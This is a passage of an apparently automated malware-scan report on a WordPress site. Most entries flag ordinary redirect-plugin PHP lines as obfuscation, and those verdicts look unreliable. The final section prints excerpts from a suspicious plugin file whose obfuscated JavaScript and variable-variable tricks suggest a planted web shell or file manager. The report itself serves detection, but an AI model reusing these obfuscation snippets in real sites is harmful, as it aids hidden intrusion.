</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 544</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 556</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">url string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">format_from_url</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 567</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$from</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 574</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">returns the current url</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">URL string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 580</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_url</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 584</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$original_request_uri</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 594</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">of redirects</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 598</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_parse_serial_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$array</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 614</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$new_redirects</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 625</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">nothing</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 628</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ajax_save_redirect</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 647</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned id</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 677</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">redirect_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$redirect</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 683</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$result</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$result </span><span style="color: #007700">: </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 697</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_save_redirects</span><span style="color: #007700">(</span><span style="color: #0000BB">$array</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 750</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ids</span><span style="color: #007700">; </span><span style="color: #FF8000">// return array of affected ids.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 756</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">Active Only redirects</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 762</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_redirects</span><span style="color: #007700">(</span><span style="color: #0000BB">$active_only </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 778</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$results</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_all</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 793</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_redirect</span><span style="color: #007700">(</span><span style="color: #0000BB">$redirect_id</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_shift</span><span style="color: #007700">(</span><span style="color: #0000BB">$results</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 808</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the result</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 812</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">increment_field</span><span style="color: #007700">(</span><span style="color: #0000BB">$id</span><span style="color: #007700">, </span><span style="color: #0000BB">$field</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 825</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will </span><span style="color: #007700">list </span><span style="color: #0000BB">out all the current entries</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 831</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">list_redirects</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 846</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 853</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will remove an entry</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 859</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ajax_eps_delete_entry</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 875</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_delete</span><span style="color: #007700">(</span><span style="color: #0000BB">$id</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 888</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will </span><span style="color: #007700">return </span><span style="color: #0000BB">a blank row ready </span><span style="color: #007700">for </span><span style="color: #0000BB">user input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 894</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_entry</span><span style="color: #007700">(</span><span style="color: #0000BB">$redirect_id </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 907</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_inline_edit_entry</span><span style="color: #007700">(</span><span style="color: #0000BB">$redirect_id </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ajax_get_inline_edit_entry</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 92</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">plugin_action_links</span><span style="color: #007700">(</span><span style="color: #0000BB">$links</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 935</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ajax_get_entry</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 947</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clear_cache</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 955</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_404</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 987</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'eps_prettify'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 988</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_prettify</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 990</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ucwords</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">"_"</span><span style="color: #007700">, </span><span style="color: #DD0000">" "</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 994</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'eps_view'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_view</span><span style="color: #007700">(</span><span style="color: #0000BB">$object</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_245").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/analytics-1769473357/sldebar.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.03 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:22:59</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:22:59</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 22</span><br><table id="file_246" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$__</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$_</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { if (</span><span style="color: #0000BB">confirm</span><span style="color: #007700">(</span><span style="color: #DD0000">'Delete?'</span><span style="color: #007700">)) </span><span style="color: #0000BB">_0x02</span><span style="color: #007700">(</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x17</span><span style="color: #007700">), </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-path'</span><span style="color: #007700">)); }); }); </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">querySelectorAll</span><span style="color: #007700">(</span><span style="color: #DD0000">'.rename-btn'</span><span style="color: #007700">).forEach(</span><span style="color: #0000BB">_0x9b </span><span style="color: #007700">=> { </span><span style="color: #0000BB">_0x9b</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0xf</span><span style="color: #007700">)](</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x11</span><span style="color: #007700">), function() { const </span><span style="color: #0000BB">_0xname </span><span style="color: #007700">= </span><span style="color: #0000BB">prompt</span><span style="color: #007700">(</span><span style="color: #DD0000">'New name:'</span><span style="color: #007700">, </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_absolute_root</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$script_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">);}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 175</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x2c</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_0x5f2e</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">];</span>
</span>
